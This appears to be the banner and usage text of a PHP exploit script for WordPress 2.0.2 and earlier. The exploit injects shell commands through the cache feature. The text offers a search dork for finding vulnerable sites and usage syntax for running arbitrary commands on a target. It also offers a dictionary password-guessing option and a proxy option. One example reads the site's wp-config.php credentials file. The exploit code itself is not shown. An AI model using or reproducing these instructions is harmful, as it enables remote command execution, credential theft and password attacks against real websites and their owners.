#!/usr/bin/php -q -d short_open_tag=on
--------------------------------------------------------------------
| WordPress <= 2.0.2 'cache' shell injection exploit               |
| by rgod rgod@autistici.org                                       |
| site: http://retrogod.altervista.org                             |
| dork: inurl:wp-login.php Register Username Password -echo        |
--------------------------------------------------------------------

Usage: php host path user pass cmd OPTIONS

host:      target server (ip/hostname)
path:      path to WordPress
cmd:       a shell command
user/pass: you need a valid user account

Options:
  -D[dictionary] specify a textfile and try dictionary attack
  -p[port]:      specify a port other than 80
  -P[ip:port]:   specify a proxy

Examples:
  php localhost /wordpress/ your_username password ls -la -Ddic.txt
  php localhost /wordpress/ your_username password cat ./../../../wp-config.php -p81
  php localhost / your_username password ls -la -P1.1.1.1:80